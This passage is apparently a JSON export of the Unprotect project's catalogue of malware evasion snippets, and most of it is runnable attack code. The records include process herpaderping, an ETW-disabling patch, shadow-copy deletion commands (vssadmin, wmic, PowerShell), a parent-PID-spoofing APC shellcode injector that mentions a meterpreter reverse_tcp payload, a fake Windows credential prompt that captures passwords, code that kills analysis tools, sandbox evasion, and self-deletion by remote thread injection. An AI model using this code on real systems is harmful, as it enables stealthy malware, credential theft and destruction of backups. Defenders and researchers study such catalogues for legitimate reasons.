Utils::Log(Log::Warning, \r\n hr,\r\n L\"Failed to hide original file bytes\");\r\n }\r\n else\r\n {\r\n hr = Utils::ExtendFileSecurityDirectory(\r\n targetHandle.get(),\r\n bytesWritten,\r\n FlagOn(Flags, FlagFlushFile));\r\n if (FAILED(hr))\r\n {\r\n Utils::Log(Log::Warning,\r\n hr,\r\n L\"Failed to retain file signature\");\r\n }\r\n }\r\n }\r\n }\r\n else\r\n {\r\n //\r\n // (B) Just overwrite the target binary with a pattern.\r\n //\r\n Utils::Log(Log::Success, L\"Overwriting target with pattern\");\r\n\r\n hr = Utils::OverwriteFileContentsWithPattern(\r\n targetHandle.get(),\r\n Pattern,\r\n FlagOn(Flags, FlagFlushFile));\r\n if (FAILED(hr))\r\n {\r\n Utils::Log(Log::Error, \r\n hr, \r\n L\"Failed to write pattern over file\");\r\n RETURN_HR(hr);\r\n }\r\n }\r\n\r\n //\r\n // Alright, at this point the process is going to be derpy enough.\r\n // Do the work necessary to make it execute.\r\n //\r\n Utils::Log(Log::Success, L\"Preparing target for execution\");\r\n\r\n PROCESS_BASIC_INFORMATION pbi{};\r\n status = NtQueryInformationProcess(processHandle.get(),\r\n ProcessBasicInformation,\r\n &pbi,\r\n sizeof(pbi),\r\n nullptr);\r\n if (!NT_SUCCESS(status))\r\n {\r\n RETURN_NTSTATUS(Utils::Log(Log::Error, \r\n status, \r\n L\"Failed to query new process info\"));\r\n }\r\n\r\n PEB peb{};\r\n if (!ReadProcessMemory(processHandle.get(),\r\n pbi.PebBaseAddress,\r\n &peb,\r\n sizeof(peb),\r\n nullptr))\r\n {\r\n RETURN_LAST_ERROR_SET(Utils::Log(Log::Error, \r\n GetLastError(), \r\n L\"Failed to read remote process PEB\"));\r\n }\r\n\r\n Utils::Log(Log::Information,\r\n L\"Writing process parameters, remote PEB ProcessParameters 0x%p\",\r\n Add2Ptr(pbi.PebBaseAddress, FIELD_OFFSET(PEB, ProcessParameters)));\r\n\r\n hr = Utils::WriteRemoteProcessParameters(\r\n processHandle.get(),\r\n TargetFileName,\r\n std::nullopt,\r\n std::nullopt,\r\n (L\"\\\"\" + TargetFileName + L\"\\\"\"),\r\n NtCurrentPeb()->ProcessParameters->Environment,\r\n TargetFileName,\r\n L\"WinSta0\\\\Default\",\r\n std::nullopt,\r\n std::nullopt);\r\n if (FAILED(hr))\r\n {\r\n Utils::Log(Log::Error, \r\n hr, \r\n L\"Failed to write remote process parameters\");\r\n RETURN_HR(hr);\r\n }\r\n\r\n if (FlagOn(Flags, FlagCloseFileEarly))\r\n {\r\n //\r\n // Caller wants to close the file early, before the notification\r\n // callback in the kernel would fire, do so.\r\n //\r\n targetHandle.reset();\r\n }\r\n\r\n //\r\n // Create the initial thread, when this first thread is inserted the\r\n // process create callback will fire in the kernel.\r\n //\r\n void* remoteEntryPoint = Add2Ptr(peb.ImageBaseAddress, imageEntryPointRva);\r\n\r\n Utils::Log(Log::Information,\r\n L\"Creating thread in process at entry point 0x%p\",\r\n remoteEntryPoint);\r\n\r\n wil::unique_handle threadHandle;\r\n status = NtCreateThreadEx(&threadHandle,\r\n THREAD_ALL_ACCESS,\r\n nullptr,\r\n processHandle.get(),\r\n remoteEntryPoint,\r\n nullptr,\r\n 0,\r\n 0,\r\n 0,\r\n 0,\r\n nullptr);\r\n if (!NT_SUCCESS(status))\r\n {\r\n threadHandle.release();\r\n RETURN_NTSTATUS(Utils::Log(Log::Error, \r\n status, \r\n L\"Failed to create remote thread\"));\r\n }\r\n\r\n Utils::Log(Log::Information,\r\n L\"Created thread, TID %lu\",\r\n GetThreadId(threadHandle.get()));\r\n\r\n if (!FlagOn(Flags, FlagKillSpawnedProcess))\r\n {\r\n //\r\n // Process was executed successfully. Do not terminate.\r\n //\r\n terminateProcess.release();\r\n }\r\n\r\n if (!FlagOn(Flags, FlagHoldHandleExclusive))\r\n {\r\n //\r\n // We're done with the target file handle. At this point the process \r\n // create callback will have fired in the kernel.\r\n //\r\n targetHandle.reset();\r\n }\r\n\r\n if (FlagOn(Flags, FlagWaitForProcess))\r\n {\r\n //\r\n // Wait for the process to exit.\r\n //\r\n Utils::Log(Log::Success, L\"Waiting for herpaderped process to exit\");\r\n\r\n WaitForSingleObject(processHandle.get(), INFINITE);\r\n\r\n DWORD targetExitCode = 0;\r\n GetExitCodeProcess(processHandle.get(), &targetExitCode);\r\n\r\n Utils::Log(Log::Success,\r\n L\"Herpaderped process exited with code 0x%08x\",\r\n targetExitCode);\r\n }\r\n else\r\n {\r\n Utils::Log(Log::Success, L\"Successfully spawned herpaderped process\");\r\n }\r\n\r\n return S_OK;\r\n}"
},
{
"id": 73,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/177/?format=api",
"description": "Snippet source code from @_vivami",
"plain_code": "void disableETW(void) {\r\n\t// return 0\r\n\tunsigned char patch[] = { 0x48, 0x33, 0xc0, 0xc3}; // xor rax, rax; ret\r\n\t\r\n\tULONG oldprotect = 0;\r\n\tsize_t size = sizeof(patch);\r\n\t\r\n\tHANDLE hCurrentProc = GetCurrentProcess();\r\n\t\r\n\tunsigned char sEtwEventWrite[] = { 'E','t','w','E','v','e','n','t','W','r','i','t','e', 0x0 };\r\n\t\r\n\tvoid *pEventWrite = GetProcAddress(GetModuleHandle((LPCSTR) sNtdll), (LPCSTR) sEtwEventWrite);\r\n\t\r\n\tNtProtectVirtualMemory(hCurrentProc, &pEventWrite, (PSIZE_T) &size, PAGE_READWRITE, &oldprotect);\r\n\t\r\n\tmemcpy(pEventWrite, patch, size / sizeof(patch[0]));\r\n\t\r\n\tNtProtectVirtualMemory(hCurrentProc, &pEventWrite, (PSIZE_T) &size, oldprotect, &oldprotect);\r\n\tFlushInstructionCache(hCurrentProc, pEventWrite, size);\r\n\t\r\n}"
},
{
"id": 71,
"language": {
"id": 7,
"label": "cmd",
"code_class": "cmd"
},
"user": {
"id": 18,
"username": "hackeT",
"email": "null@localhost",
"linkedin": "https://www.linkedin.com/in/tatsuya-hasegawa-aa3279142/",
"twitter": "https://twitter.com/T_8ase",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/175/?format=api",
"description": "",
"plain_code": "vssadmin.exe delete shadows /all /quiet\r\nwmic shadowcopy delete /nointeractive\r\nvssadmin resize shadowstorage /for= /on= /maxsize="
},
{
"id": 72,
"language": {
"id": 8,
"label": "PowerShell",
"code_class": "PowerShell"
},
"user": {
"id": 18,
"username": "hackeT",
"email": "null@localhost",
"linkedin": "https://www.linkedin.com/in/tatsuya-hasegawa-aa3279142/",
"twitter": "https://twitter.com/T_8ase",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/175/?format=api",
"description": "",
"plain_code": "Get-WmiObject Win32_ShadowCopy | % { $_.Delete() }\r\nGet-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }\r\nGet-WmiObject Win32_ShadowCopy | Remove-WmiObject"
},
{
"id": 69,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 17,
"username": "Halil Dalabasmaz",
"email": "null@localhost",
"linkedin": "https://www.linkedin.com/in/hlldz",
"twitter": "https://twitter.com/hlldz",
"website": "artofpwn.com",
"github": null
},
"technique": "https://unprotect.it/api/techniques/173/?format=api",
"description": "",
"plain_code": "#include <windows.h>\r\n#include <TlHelp32.h>\r\n#include <iostream>\r\n\r\nDWORD getParentProcessID() {\r\n\tHANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\r\n\tPROCESSENTRY32 process = { 0 };\r\n\tprocess.dwSize = sizeof(process);\r\n\r\n\tif (Process32First(snapshot, &process)) {\r\n\t\tdo {\r\n \t\t//If you want to another process as parent change here\r\n\t\t\tif (!wcscmp(process.szExeFile, L\"explorer.exe\"))\r\n\t\t\t\tbreak;\r\n\t\t} while (Process32Next(snapshot, &process));\r\n\t}\r\n\r\n\tCloseHandle(snapshot);\r\n\treturn process.th32ProcessID;\r\n}\r\n\r\nint main() {\r\n\r\n\t//Shellcode, for example; msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x EXITFUNC=thread -f c\r\n\tunsigned char shellCode[] = \"\";\r\n\r\n\tSTARTUPINFOEXA sInfoEX;\r\n\tPROCESS_INFORMATION pInfo;\r\n\tSIZE_T sizeT;\r\n\r\n\tHANDLE expHandle = OpenProcess(PROCESS_ALL_ACCESS, false, getParentProcessID());\r\n\r\n\tZeroMemory(&sInfoEX, sizeof(STARTUPINFOEXA));\r\n\tInitializeProcThreadAttributeList(NULL, 1, 0, &sizeT);\r\n\tsInfoEX.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, sizeT);\r\n\tInitializeProcThreadAttributeList(sInfoEX.lpAttributeList, 1, 0, &sizeT);\r\n\tUpdateProcThreadAttribute(sInfoEX.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &expHandle, sizeof(HANDLE), NULL, NULL);\r\n\tsInfoEX.StartupInfo.cb = sizeof(STARTUPINFOEXA);\r\n\r\n\tCreateProcessA(\"C:\\\\Program Files\\\\internet explorer\\\\iexplore.exe\", NULL, NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, reinterpret_cast<LPSTARTUPINFOA>(&sInfoEX), &pInfo);\r\n\r\n\tLPVOID lpBaseAddress = (LPVOID)VirtualAllocEx(pInfo.hProcess, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tSIZE_T *lpNumberOfBytesWritten = 0;\r\n\tBOOL resWPM = WriteProcessMemory(pInfo.hProcess, lpBaseAddress, (LPVOID)shellCode, sizeof(shellCode), lpNumberOfBytesWritten);\r\n\r\n\tQueueUserAPC((PAPCFUNC)lpBaseAddress, pInfo.hThread, NULL);\r\n\tResumeThread(pInfo.hThread);\r\n\tCloseHandle(pInfo.hThread);\r\n\r\n\treturn 0;\r\n}"
},
{
"id": 70,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 17,
"username": "Halil Dalabasmaz",
"email": "null@localhost",
"linkedin": "https://www.linkedin.com/in/hlldz",
"twitter": "https://twitter.com/hlldz",
"website": "artofpwn.com",
"github": null
},
"technique": "https://unprotect.it/api/techniques/174/?format=api",
"description": "",
"plain_code": "#include <Windows.h>\r\n#include <tchar.h>\r\n#include <CommCtrl.h>\r\n#include <wincred.h>\r\n#include <iostream>\r\n#include <atlstr.h>\r\n\r\n#pragma comment(lib, \"comctl32.lib\")\r\n#pragma comment(lib, \"Credui.lib\")\r\n\r\nvoid pickl3() {\r\n\r\n\tBOOL loginStatus = FALSE;\r\n\tdo {\r\n\t\tCREDUI_INFOW credui = {};\r\n\t\tcredui.cbSize = sizeof(credui);\r\n\t\tcredui.hwndParent = nullptr;\r\n\t\t//credui.pszMessageText = L\"...\";\r\n\t\tcredui.pszCaptionText = L\"Please verify your Windows user credentials to proceed.\";\r\n\t\tcredui.hbmBanner = nullptr;\r\n\r\n\t\tULONG authPackage = 0;\r\n\t\tLPVOID outCredBuffer = nullptr;\r\n\t\tULONG outCredSize = 0;\r\n\t\tBOOL save = false;\r\n\t\tDWORD err = 0;\r\n\r\n\t\terr = CredUIPromptForWindowsCredentialsW(&credui, err, &authPackage, nullptr, 0, &outCredBuffer, &outCredSize, &save, CREDUIWIN_ENUMERATE_CURRENT_USER);\r\n\t\tif (err == ERROR_SUCCESS) {\r\n\t\t\tWCHAR pszUName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];\r\n\t\t\tWCHAR pszPwd[CREDUI_MAX_PASSWORD_LENGTH * sizeof(WCHAR)];\r\n\t\t\tWCHAR domain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];\r\n\t\t\tDWORD maxLenName = CREDUI_MAX_USERNAME_LENGTH + 1;\r\n\t\t\tDWORD maxLenPassword = CREDUI_MAX_PASSWORD_LENGTH + 1;\r\n\t\t\tDWORD maxLenDomain = CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1;\r\n\t\t\tCredUnPackAuthenticationBufferW(CRED_PACK_PROTECTED_CREDENTIALS, outCredBuffer, outCredSize, pszUName, &maxLenName, domain, &maxLenDomain, pszPwd, &maxLenPassword);\r\n\r\n\t\t\tWCHAR parsedUserName[CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR)];\r\n\t\t\tWCHAR parsedDomain[CREDUI_MAX_DOMAIN_TARGET_LENGTH * sizeof(WCHAR)];\r\n\t\t\tCredUIParseUserNameW(pszUName, parsedUserName, CREDUI_MAX_USERNAME_LENGTH + 1, parsedDomain, CREDUI_MAX_DOMAIN_TARGET_LENGTH + 1);\r\n\r\n\t\t\tHANDLE handle = nullptr;\r\n\t\t\tloginStatus = LogonUserW(parsedUserName, parsedDomain, pszPwd, LOGON32_LOGON_NETWORK, LOGON32_PROVIDER_DEFAULT, &handle);\r\n\r\n\r\n\t\t\tif (loginStatus == TRUE) {\r\n\t\t\t\tCloseHandle(handle);\r\n\t\t\t\tstd::wcout << \"\\n[+] Valid credential is entered as \" << pszUName << \":\" << pszPwd;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\telse {\r\n\t\t\t\tstd::wcout << \"\\n[-] Invalid credential is entered as \" << pszUName << \":\" << pszPwd;\r\n\t\t\t\tloginStatus = FALSE;\r\n\t\t\t}\r\n\t\t}\r\n\t} while (loginStatus == FALSE);\r\n}\r\n\r\n\r\n\r\nint main () {\r\n\t\r\n\tpickl3();\r\n\treturn 0;\r\n}"
},
{
"id": 68,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 14,
"username": "Kağan IŞILDAK",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/kaganisildak",
"website": "https://kaganisildak.com",
"github": "https://github.com/kaganisildak"
},
"technique": "https://unprotect.it/api/techniques/168/?format=api",
"description": "Source: https://github.com/Malwation/InceptionAttack",
"plain_code": "#include <iostream>\r\n#include <windows.h>\r\n#include <TlHelp32.h>\r\n#define DEBUG_MODE 1\r\n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)\r\n#define ThreadQuerySetWin32StartAddress 9\r\n\r\ntypedef NTSTATUS(WINAPI* NTQUERYINFOMATIONTHREAD)(HANDLE, LONG, PVOID, ULONG, PULONG);\r\n\r\nstruct args {\r\n\tHANDLE hThread;\r\n};\r\n\r\nDWORD_PTR WINAPI GetThreadStartAddress(HANDLE hThread)\r\n{\r\n\tNTSTATUS ntStatus;\r\n\tDWORD_PTR dwThreadStartAddr;\r\n\tNTQUERYINFOMATIONTHREAD NtQueryInformationThread;\r\n\tNtQueryInformationThread = (NTQUERYINFOMATIONTHREAD)GetProcAddress(GetModuleHandleA(\"ntdll.dll\"), \"NtQueryInformationThread\");\r\n\tntStatus = NtQueryInformationThread(hThread, ThreadQuerySetWin32StartAddress, &dwThreadStartAddr, sizeof(DWORD_PTR), NULL);\r\n\tif (ntStatus != STATUS_SUCCESS) {\r\n\t\treturn 0;\r\n\t}\r\n\treturn dwThreadStartAddr;\r\n}\r\n\r\nDWORD_PTR * GetModuleInfo(DWORD pid, const wchar_t *target) {\r\n\tHANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE | TH32CS_SNAPMODULE32, pid);\r\n\tDWORD_PTR moduleinfo[2];\r\n\tif (hSnap != INVALID_HANDLE_VALUE)\r\n\t{\r\n\t\tMODULEENTRY32 modEntry;\r\n\t\tmodEntry.dwSize = sizeof(modEntry);\r\n\t\tif (Module32First(hSnap, &modEntry))\r\n\t\t{\r\n\t\t\tdo\r\n\t\t\t{\r\n\t\t\t\tif (!_wcsicmp(modEntry.szModule, target)) {\r\n\t\t\t\t\tmoduleinfo[0] = (DWORD_PTR)modEntry.modBaseAddr;\r\n\t\t\t\t\tmoduleinfo[1] = modEntry.modBaseSize;\r\n\t\t\t\t\treturn moduleinfo;\r\n\t\t\t\t}\r\n\t\t\t\t//std::wcout << \"Name: \" << modEntry.szModule << \"\\t Addr: \" << modEntry.modBaseAddr << \"\\n\";\r\n\t\t\t} while (Module32Next(hSnap, &modEntry));\r\n\t\t}\r\n\t}\r\n\treturn 0;\r\n}\r\n\r\nBOOL isTarget(HANDLE tHandle, DWORD pid, const wchar_t *target) {\r\n\tDWORD_PTR ThreadStartAddr = GetThreadStartAddress(tHandle);\r\n\tif (!ThreadStartAddr) {\r\n\t\tstd::cout << \"Get start address of thread failed!\\n\";\r\n\t\tExitProcess(1);\r\n\t}\r\n\tDWORD_PTR* retmoduleinfo = GetModuleInfo(pid, target);\r\n\tDWORD_PTR ModuleStart = retmoduleinfo[0];\r\n\tDWORD_PTR ModuleEnd = retmoduleinfo[0] + retmoduleinfo[1];\r\n\t// Only shows debug mode on (1)\r\n\tif (DEBUG_MODE) {\r\n\t\tprintf(\"THREAD START ADDR: %012X\\n\", ThreadStartAddr);\r\n\t\tprintf(\"MODULE START ADDR: %012X\\n\", retmoduleinfo[0]);\r\n\t\tprintf(\"MODULE END ADDR: %012X\\n\", retmoduleinfo[0] + retmoduleinfo[1]);\r\n\t}\r\n\tif (ThreadStartAddr >= ModuleStart && ThreadStartAddr <= ModuleEnd) { // Is thread start address between ModuleStart and ModuleEnd?\r\n\t\treturn TRUE;\r\n\t}\r\n\telse {\r\n\t\treturn FALSE;\r\n\t}\r\n}\r\n\r\nvoid CrackAnyRun(LPVOID inargs) {\r\n\targs *funcargs = (args*)inargs;\r\n\tHANDLE tHandle = funcargs->hThread;\r\n\twhile (1){\r\n\t\tSuspendThread(tHandle);\r\n\t\tstd::cout << \"Thread suspended\\n\";\r\n\t\tSleep(24000);\r\n\t\tResumeThread(tHandle);\r\n\t\tstd::cout << \"Thread resumed\\n\";\r\n\t\tSleep(1000);\r\n\t}\r\n}\r\n\r\nint main()\r\n{\r\n\tHANDLE tHandle, pHandle = 0, hToken;\r\n\tDWORD tid, pid = 0;\r\n\tLUID luid = { 0 };\r\n\tBOOL privRet = FALSE;\r\n\r\n\tif (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))\r\n\t{\r\n\t\tstd::cout << \"OpenProcessToken success!\\n\";\r\n\t\tif (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))\r\n\t\t{\r\n\t\t\tTOKEN_PRIVILEGES tokenPriv = { 0 };\r\n\t\t\ttokenPriv.PrivilegeCount = 1;\r\n\t\t\ttokenPriv.Privileges[0].Luid = luid;\r\n\t\t\ttokenPriv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;\r\n\t\t\tprivRet = AdjustTokenPrivileges(hToken, FALSE, &tokenPriv, sizeof(TOKEN_PRIVILEGES), NULL, NULL);\r\n\t\t}\r\n\t}\r\n\telse {\r\n\t\tstd::cout << \"OpenProcessToken failed! Error: \" << GetLastError() << \"\\n\";\r\n\t\tExitProcess(1);\r\n\t}\r\n\tif (!privRet) {\r\n\t\tstd::cout << \"Adjust privilege failed!\\n\";\r\n\t\tExitProcess(1);\r\n\t}\r\n\r\n\t// Find PID by name\r\n\tPROCESSENTRY32 pe; \r\n\tHANDLE hps = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\r\n\tif (hps != INVALID_HANDLE_VALUE) {\r\n\t\tpe.dwSize = sizeof(PROCESSENTRY32);\r\n\t\tif (Process32First(hps, &pe)) {\r\n\t\t\tdo {\r\n\t\t\t\tif (!_wcsicmp(pe.szExeFile, L\"srvpost.exe\")) {\r\n\t\t\t\t\tpid = pe.th32ProcessID;\r\n\t\t\t\t}\r\n\t\t\t} while (Process32Next(hps, &pe));\r\n\t\t}\r\n\t}\r\n\telse {\r\n\t\tstd::cout << \"Process snapshot cannot taken!\\n\";\r\n\t\tExitProcess(1);\r\n\t}\r\n\tif (pid == 0) {\r\n\t\tstd::cout << \"Process not found!\\n\";\r\n\t\tExitProcess(1);\r\n\t}\r\n\t// Retrieve threads in process\r\n\tHANDLE hth = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);\r\n\tif (hth != INVALID_HANDLE_VALUE) {\r\n\t\tTHREADENTRY32 te;\r\n\t\tte.dwSize = sizeof(te);\r\n\t\tif (Thread32First(hth, &te)) {\r\n\t\t\tdo {\r\n\t\t\t\tif (te.th32OwnerProcessID == pid) {\r\n\t\t\t\t\ttHandle = OpenThread(THREAD_SUSPEND_RESUME | THREAD_QUERY_INFORMATION, FALSE, te.th32ThreadID);\r\n\t\t\t\t\tif (tHandle != INVALID_HANDLE_VALUE) {\r\n\t\t\t\t\t\tif (isTarget(tHandle, pid, L\"winsanr.dll\")) {\r\n\t\t\t\t\t\t\tSuspendThread(tHandle);\r\n\t\t\t\t\t\t\t// Only shows debug mode on (1)\r\n\t\t\t\t\t\t\tif (DEBUG_MODE) {\r\n\t\t\t\t\t\t\t\tstd::cout << \"THREADID: \" << te.th32ThreadID << \"\\n\";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t// Crack any.run :D \r\n\t\t\t\t\t\tif (isTarget(tHandle, pid, L\"sechost.dll\")) {\r\n\t\t\t\t\t\t\tHANDLE dupHandle;\r\n\t\t\t\t\t\t\tif (DuplicateHandle(GetCurrentProcess(), tHandle, GetCurrentProcess(), &dupHandle, THREAD_SUSPEND_RESUME, FALSE, 0)) {\r\n\t\t\t\t\t\t\t\targs thargs;\r\n\t\t\t\t\t\t\t\tthargs.hThread = dupHandle;\r\n\t\t\t\t\t\t\t\tCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)CrackAnyRun, &thargs, 0, NULL);\r\n\t\t\t\t\t\t\t\tCloseHandle(tHandle);\r\n\t\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse {\r\n\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tCloseHandle(tHandle);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t} while (Thread32Next(hth, &te));\r\n\t\t}\r\n\t}\r\n\telse {\r\n\t\tstd::cout << \"Thread snapshot cannot taken!\\n\";\r\n\t\tExitProcess(1);\r\n\t}\r\n\twhile (1); // for second thread\r\n}"
},
{
"id": 67,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 16,
"username": "Ahmed",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/0xastr0",
"website": null,
"github": "https://vxcute.github.io/"
},
"technique": "https://unprotect.it/api/techniques/131/?format=api",
"description": "",
"plain_code": "#include <iostream>\r\n#include <Windows.h>\r\n#include <Psapi.h>\r\n#include <vector>\r\n#include <TlHelp32.h>\r\n\r\n#pragma comment(lib, \"Psapi\")\r\n#pragma comment(lib,\"ntdll.lib\")\r\n\r\ntypedef NTSTATUS(NTAPI* _NtGetNextProcess)(\r\n\t_In_ HANDLE ProcessHandle,\r\n\t_In_ ACCESS_MASK DesiredAccess,\r\n\t_In_ ULONG HandleAttributes,\r\n\t_In_ ULONG Flags,\r\n\t_Out_ PHANDLE NewProcessHandle\r\n\t);\r\n\r\nstd::vector<std::string> procs =\r\n{\r\n\t\"ProcessHacker.exe\", \r\n\t\"Wireshark.exe\"\r\n};\r\n\r\nauto terminate_process() -> void\r\n{\r\n\tHMODULE ntdll = GetModuleHandleA(\"ntdll.dll\");\r\n\tHANDLE currp = nullptr;\r\n\tchar buf[1024] = { 0 };\r\n\r\n\t_NtGetNextProcess NtGetNextProcess = (_NtGetNextProcess)GetProcAddress(ntdll, \"NtGetNextProcess\");\r\n\r\n\tfor (int i = 0; i < procs.size(); i++) {\r\n\t\tdo {\r\n\t\t\tGetModuleFileNameExA(currp, 0, buf, MAX_PATH);\r\n\t\t\tif (strstr(buf, procs[i].c_str()))\r\n\t\t\t\tTerminateProcess(currp, -1);\r\n\t\t} while (!NtGetNextProcess(currp, MAXIMUM_ALLOWED, 0, 0, &currp));\r\n\t}\r\n}\r\n\r\nint main()\r\n{\r\n\tterminate_process();\r\n\treturn 0;\r\n}"
},
{
"id": 66,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 15,
"username": "Fumik0_",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/fumik0_",
"website": "https://fumik0.com/",
"github": null
},
"technique": "https://unprotect.it/api/techniques/169/?format=api",
"description": "",
"plain_code": "#include <iostream>\r\n#include <windows.h>\r\n\r\nusing namespace std;\r\n\r\nint main()\r\n{\r\n\tSIZE_T s;\r\n\tprintf(\"Starting the LocalSize()\\n\");\r\n\tfor (int i = 0; i < 0xFFF; i++){\r\n\t s = LocalSize(0);\r\n\t}\r\n\tprintf(\"Sempai! :) \\n\");\r\n\treturn 0;\r\n}"
},
{
"id": 65,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"user": {
"id": 14,
"username": "Kağan IŞILDAK",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/kaganisildak",
"website": "https://kaganisildak.com",
"github": "https://github.com/kaganisildak"
},
"technique": "https://unprotect.it/api/techniques/168/?format=api",
"description": "This snippet detects if the process is running in the online sandbox app.any.run.",
"plain_code": "import subprocess\r\n\r\ndef executer(args):\r\n proc = subprocess.Popen(args,stdout=subprocess.PIPE)\r\n return str(proc.communicate()[0])\r\n\r\ncert = executer([\"powershell.exe\", \"-Command\",\"Get-ChildItem\",\"-Recurse\",\"Cert:CurrentUser\\My\"])\r\nproc = executer([\"powershell.exe\",\"Get-Process\"])\r\ndlls = executer([\"listdlls.exe\",\"srvpost.exe\",\"/accepteula\"])\r\n\r\nSUSDLLS = (\"winanr.dll\", \"winsanr.dll\")\r\nif any(dll in dlls for dll in SUSDLLS): print(\"Any.Run Monitoring Agent Found\")\r\n\r\nif \"Some Company\" in cert or \"srvpost\" in proc:\r\n print(\"ANY.RUN DETECTED\")\r\nelse:\r\n print(\"NOT ANY.RUN\")"
},
{
"id": 63,
"language": {
"id": 6,
"label": "MASM",
"code_class": "x86asm"
},
"user": {
"id": 13,
"username": "Jochen",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/Jochen16291934",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/167/?format=api",
"description": "",
"plain_code": "include 'win64ax.inc'\r\ninclude 'pe.inc'\r\nentry start\r\n\r\n\r\nstart:\r\n\r\n sub rsp, 8 ; Align stack\r\n\r\n fastcall [GetModuleFileNameA], 0, modulename, 50 ; Get full path of this file\r\n\r\n mov rax,[gs:60h] ; PEB\r\n mov rax,[rax+10h] ; ImageBaseAddress\r\n\r\n mov [ImageBaseAddress], rax\r\n\r\n movsxd rax, dword [rax+IMAGE_DOS_HEADER.e_lfanew]\r\n add rax,[ImageBaseAddress]\r\n\r\n mov eax, dword [rax+IMAGE_NT_HEADERS64.OptionalHeader.SizeOfImage]\r\n mov [dwSize], eax\r\n\r\n ; To work for Win10 we must clear the sinfo struct (104 Bytes)\r\n\r\n cinvoke memset, sinfo, 0, 104d\r\n mov [sinfo.cb], 104d\r\n\r\n ; Now we create the process to inject our code in with CREATE_SUSPENDED flag so it does not actually run :)\r\n\r\n fastcall [CreateProcessA], 0, sCalc, 0, 0, FALSE, CREATE_SUSPENDED, 0, 0, sinfo, pinfo\r\n\r\n\r\n ; Allocate memory in the remote process (Calc.exe)\r\n\r\n fastcall [VirtualAllocEx], [pinfo.hProcess], [ImageBaseAddress], [dwSize], MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE\r\n\r\n ; Write it to the remote process\r\n\r\n fastcall [WriteProcessMemory], [pinfo.hProcess], rax, [ImageBaseAddress], [dwSize], 0\r\n\r\n ; execute the code pointed by HijackedThread into the remote process\r\n\r\n fastcall [CreateRemoteThread], [pinfo.hProcess], 0, 0, HijackedThread, 0, 0, 0\r\n\r\nexit: fastcall [ExitProcess], 0 ; exit this process so the injected code can delete this file !\r\n\r\n\r\n\r\n HijackedThread:\r\n\r\n sub rsp, 8\r\n\r\n invoke DeleteFileA, modulename ; <-- modulename contains the full path of this file\r\n invoke ExitProcess,0\r\n\r\n\r\n\r\nsection '.data' data readable writeable\r\n\r\n\r\nsCalc db 'calc.exe',0 ; <-- process where we inject our code in\r\n\r\n\r\n modulename rb 50\r\n\r\n\r\n\r\n pinfo\t PROCESS_INFORMATION\r\n sinfo\t STARTUPINFO\r\n\r\n ImageBaseAddress dq 0\r\n dwSize \t dd 0\r\n\r\n\r\nsection '.idata' import data readable writeable\r\n\r\n library kernel32,'KERNEL32.DLL',\\\r\n\t user32,'USER32.DLL',\\\r\n\t msvcrt,'msvcrt.dll'\r\n\r\n\r\n import msvcrt,\\\r\n\tmemset,'memset'\r\n\r\n include 'api\\kernel32.inc'\r\n include 'api\\user32.inc'"
},
{
"id": 64,
"language": {
"id": 6,
"label": "MASM",
"code_class": "x86asm"
},
"user": {
"id": 13,
"username": "Jochen",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/Jochen16291934",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/167/?format=api",
"description": "",
